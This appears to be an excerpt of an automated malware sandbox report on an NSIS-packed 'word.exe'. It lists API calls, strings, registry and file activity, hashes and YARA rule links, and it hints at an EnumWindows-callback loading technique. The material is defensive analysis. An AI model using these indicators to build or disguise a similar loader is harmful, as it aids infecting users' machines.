Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
Instruction ID: a10b3c54e235fed7265b7e368dd63080585aa0dd988869772eea30aa6a37580d
Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
Instruction Fuzzy Hash: 2DD012319590306BC3105F786D0C85B7A589B993317618A33B466F62F0C7388D629AE9

Function 0040601C Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
Instruction ID: d05ccde32c27ce198b4ddd6d941ac6fef01cdbbca41556c28887b76fd68ddc7b
Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
Instruction Fuzzy Hash: 0AE0CD3290411167C320AB749D44E3B73ACAFC5750305483DF506F2151D734AC11E7AD

Function 00403787 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

lstrcatA.KERNEL32(1033,0041FCF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCF8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77583410,"C:\Users\user\Desktop\word.exe",00000000), ref: 00403802
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\spherosome\preadoption\preembodiment,1033,0041FCF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCF8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
GetFileAttributesA.KERNEL32(Call), ref: 00403895
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\spherosome\preadoption\preembodiment), ref: 004038DE

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

RegisterClassA.USER32(00422EA0), ref: 0040391B
SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403933
CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
ShowWindow.USER32(00000005,00000000), ref: 0040399E
LoadLibraryA.KERNEL32(RichEd20), ref: 004039AF
LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
RegisterClassA.USER32(00422EA0), ref: 004039E0
DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF

Strings

RichEd20, xrefs: 004039AA
_Nb, xrefs: 004038FA, 00403962
C:\Users\user\spherosome\preadoption\preembodiment, xrefs: 00403811, 00403819, 004038B1, 004038B7, 004038C7
RichEdit, xrefs: 004039D1
RichEd32, xrefs: 004039B5
.DEFAULT\Control Panel\International, xrefs: 004037ED
1033, xrefs: 004037A7, 004037FD
"C:\Users\user\Desktop\word.exe", xrefs: 0040378B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403793
Control Panel\Desktop\ResourceLocale, xrefs: 004037BB
.exe, xrefs: 00403884
RichEdit20A, xrefs: 004039C2, 004039C8
Call, xrefs: 00403845, 0040384D, 0040385A, 004038A4, 004038AA

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\word.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\spherosome\preadoption\preembodiment$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-1990353284
Opcode ID: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
Instruction ID: 105b881253acfb20a149285e15a71ffac9a88723c4648682b83d6f47b67848ff
Opcode Fuzzy Hash: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
Instruction Fuzzy Hash: CC61D6B16442007EE720AF619D45F273EACEB8475AF40407FF945B22E1D67CAD02DA2E

Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C8D
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\word.exe,00000400), ref: 00402CA9

Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\word.exe,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00402CF2
GlobalAlloc.KERNELBASE(?,00409130), ref: 00402E39

Strings

"C:\Users\user\Desktop\word.exe", xrefs: 00402C79
Null, xrefs: 00402D72
C:\Users\user\Desktop\word.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
soft, xrefs: 00402D69
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
Inst, xrefs: 00402D60
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
Error launching installer, xrefs: 00402CC9

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\word.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2932541745
Opcode ID: 9a1918b45dc2591702618bea9aed4c2f7de89d0b4c56eebfc9df6ac8145067ba
Instruction ID: a3297f7e43c120df5600b6fd5f4255024b2ca4e5a22dc20eb426d949fad314b7
Opcode Fuzzy Hash: 9a1918b45dc2591702618bea9aed4c2f7de89d0b4c56eebfc9df6ac8145067ba
Instruction Fuzzy Hash: E661C671A40205ABDF20AF64DE89B9A76B4EF00315F60413BF904B72D1D7BC9E419BAD

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalAlloc.KERNELBASE(?,000014A4), ref: 10001B67
lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
GlobalFree.KERNEL32(00000000), ref: 10001BCC
GlobalFree.KERNEL32(?), ref: 10001CC4
GlobalFree.KERNEL32(?), ref: 10001CC9
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(00000000), ref: 10001E76
lstrcpyA.KERNEL32(?,?), ref: 10001FCA

Memory Dump Source

Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_word.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\spherosome\preadoption\preembodiment\Himlede,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\spherosome\preadoption\preembodiment\Himlede,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Strings

Call, xrefs: 0040175B, 00401764, 00401783, 00401794, 004017CA, 004017E0, 004017FE, 0040183E, 004018BF, 004018C8, 004018D2, 004018DD
C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll, xrefs: 0040180C, 00401828
C:\Users\user\spherosome\preadoption\preembodiment\Himlede, xrefs: 0040176C
C:\Users\user\AppData\Local\Temp\nsy9448.tmp, xrefs: 00401789, 004017F8, 00401816
user32::EnumWindows(i r1 ,i 0), xrefs: 004017F3, 004017FF, 00401817

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsy9448.tmp$C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll$C:\Users\user\spherosome\preadoption\preembodiment\Himlede$Call$user32::EnumWindows(i r1 ,i 0)
API String ID: 1941528284-3193061312
Opcode ID: e031dc2ebf519e94a1e2f00937ded2b8ce85dfd93a4ffebdd769cee2c96c1e4a
Instruction ID: 6271ed47795bff7848a1184a65af423285d25a4990901b96ed448ffc086cd7e6
Opcode Fuzzy Hash: e031dc2ebf519e94a1e2f00937ded2b8ce85dfd93a4ffebdd769cee2c96c1e4a
Instruction Fuzzy Hash: 4E41C371900615BBCF10BFA5DC46EAF3669DF41368B20823BF521B20E1D63C8A419B6D

Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(?), ref: 00401D29
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
ReleaseDC.USER32(?,00000000), ref: 00401D56
CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1

Strings

Tahoma, xrefs: 00401D87

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 8273c5010cf8a0948b2452c9b404e63bb4d9846eead8e2b8c23fb773179617ee
Instruction ID: 34424dcacaa19df80ac017e3b34477b9893efc0acb885e50cf323370767d2cbe
Opcode Fuzzy Hash: 8273c5010cf8a0948b2452c9b404e63bb4d9846eead8e2b8c23fb773179617ee
Instruction Fuzzy Hash: 05011271948340AFE701DBB0AE0AB9A7F74EB19705F108435F141B72E2C6B954159B2F

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Strings

C:\Users\user\AppData\Local\Temp\nsy9448.tmp, xrefs: 0040236B, 00402379, 0040238D, 0040239D, 004023A8

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsy9448.tmp
API String ID: 1356686001-4006887098
Opcode ID: d31aa366e37b9b3f9fe6114590fb4958bdebd1bd222923d910175118945ab26d
Instruction ID: 1cf33929fc1c1ea186c23a4fc9732b6d29fed694b94c5232bf99ec9a4aeb90bc
Opcode Fuzzy Hash: d31aa366e37b9b3f9fe6114590fb4958bdebd1bd222923d910175118945ab26d
Instruction Fuzzy Hash: 941172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040581A: CharNextA.USER32(?,?,C:\,?,00405886,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405828
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841

CreateDirectoryA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015DB
GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\spherosome\preadoption\preembodiment\Himlede,00000000,00000000,?), ref: 00401622

Strings

C:\Users\user\spherosome\preadoption\preembodiment\Himlede, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\spherosome\preadoption\preembodiment\Himlede
API String ID: 3751793516-3180547735
Opcode ID: db067ccd22148f177b322be21d88d745b7a3f5ab5b1866c20e8660ff99211a32
Instruction ID: 1974da3e9f268a507fe0b48e67c441281edfefc09bb705423f1444e47e3c3739
Opcode Fuzzy Hash: db067ccd22148f177b322be21d88d745b7a3f5ab5b1866c20e8660ff99211a32
Instruction Fuzzy Hash: 4D112931908150ABDB113F755D4496F37B4EA62365728873FF891B22D1C23C4D42A62E

Function 004059B1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004059C5
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DF

Strings

"C:\Users\user\Desktop\word.exe", xrefs: 004059B1
nsa, xrefs: 004059BC
C:\Users\user\AppData\Local\Temp\, xrefs: 004059B4, 004059B8

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\word.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-538414908
Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
Instruction ID: 4ed204ab2def1aeaad47fe5e86fe5e9a332b18b7b34da24a025185dbc17c0528
Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
Instruction Fuzzy Hash: 60F02732308308BBEB008F16DC04B9B7B9CDF95720F00C03BF904EA281D2B0D8048B98

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
RegCloseKey.ADVAPI32(?), ref: 00402AA3
RegCloseKey.ADVAPI32(?), ref: 00402AC8
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
Instruction ID: 87201a58af63731299c065c60a73f314b5aa52cedce30dc2bb0b82caebebd8ee
Opcode Fuzzy Hash: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
Instruction Fuzzy Hash: 7B114F71A00008FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0D7B59E55AF69

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(?,7D8BEC45), ref: 100021E2

Part of subcall function 1000258D: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FF

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
